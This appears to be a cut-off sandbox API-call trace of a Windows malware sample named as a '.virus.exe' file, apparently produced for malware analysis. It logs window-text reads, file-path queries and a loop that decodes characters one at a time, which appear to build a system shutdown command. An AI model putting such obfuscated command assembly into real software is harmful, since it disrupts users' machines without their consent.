returned 0x0 [0178.095] GetForegroundWindow () returned 0x102c2 [0178.095] GetLastError () returned 0x0 [0178.095] SysStringLen (param_1=" ") returned 0xff [0178.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.095] SysStringLen (param_1=" ") returned 0xff [0178.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.096] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0178.096] GetLastError () returned 0x0 [0178.096] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.096] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0178.097] SysStringLen (param_1="Act") returned 0x3 [0178.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0x116863c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0178.097] SetWindowTextA (hWnd=0x103c4, lpString="Act") returned 1 [0178.097] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.097] GetFocus () returned 0x0 [0178.097] lstrlenA (lpString="Act") returned 3 [0178.098] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0178.098] IsWindow (hWnd=0x103c4) returned 1 [0178.098] IsWindow (hWnd=0x103c4) returned 1 [0178.098] IsWindow (hWnd=0x103c4) returned 1 [0178.099] IsWindow (hWnd=0x103c4) returned 1 [0178.099] GetFocus () returned 0x0 [0178.099] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0178.099] GetFocus () returned 0x0 [0178.099] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0178.100] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0178.100] GetFocus () returned 0x0 [0178.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0178.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0178.100] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.100] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.101] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.102] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.102] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.102] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.103] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.103] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.104] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.104] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.105] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.105] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.106] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.106] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.107] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.107] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.108] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.108] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.109] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.109] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.110] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.110] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.110] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.111] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.111] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.111] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.112] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.112] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.113] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.113] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.113] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.114] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.114] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.114] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.115] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.115] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.116] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.116] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.117] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.117] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.118] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.118] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.118] GetForegroundWindow () returned 0x102c2 [0178.118] GetLastError () returned 0x0 [0178.118] SysStringLen (param_1=" ") returned 0xff [0178.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.119] SysStringLen (param_1=" ") returned 0xff [0178.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.119] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0178.119] GetLastError () returned 0x0 [0178.119] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.119] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0178.120] SysStringLen (param_1="Ac") returned 0x2 [0178.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0178.120] SetWindowTextA (hWnd=0x103c4, lpString="Ac") returned 1 [0178.120] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0178.120] GetFocus () returned 0x0 [0178.120] lstrlenA (lpString="Ac") returned 2 [0178.121] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0178.146] IsWindow (hWnd=0x103c4) returned 1 [0178.147] IsWindow (hWnd=0x103c4) returned 1 [0178.147] IsWindow (hWnd=0x103c4) returned 1 [0178.147] IsWindow (hWnd=0x103c4) returned 1 [0178.147] GetFocus () returned 0x0 [0178.148] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.148] GetFocus () returned 0x0 [0178.148] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0178.148] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0178.148] GetFocus () returned 0x0 [0178.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0178.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0178.148] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.149] VarBstrCmp (bstrLeft="Ac", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.149] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0178.149] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0178.149] GetTickCount () returned 0x1d19481 [0178.150] IsWindowVisible (hWnd=0x103b8) returned 0 [0178.150] Sleep (dwMilliseconds=0x0) [0178.282] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0178.283] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0178.285] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0178.285] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0178.285] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0178.286] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0178.286] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0178.286] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0178.286] IsWindow (hWnd=0x103bc) returned 1 [0178.286] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0178.287] IsIconic (hWnd=0x103b8) returned 0 [0178.287] GetParent (hWnd=0x103bc) returned 0x103b8 [0178.287] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0178.287] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0178.287] KillTimer (hWnd=0x103bc, 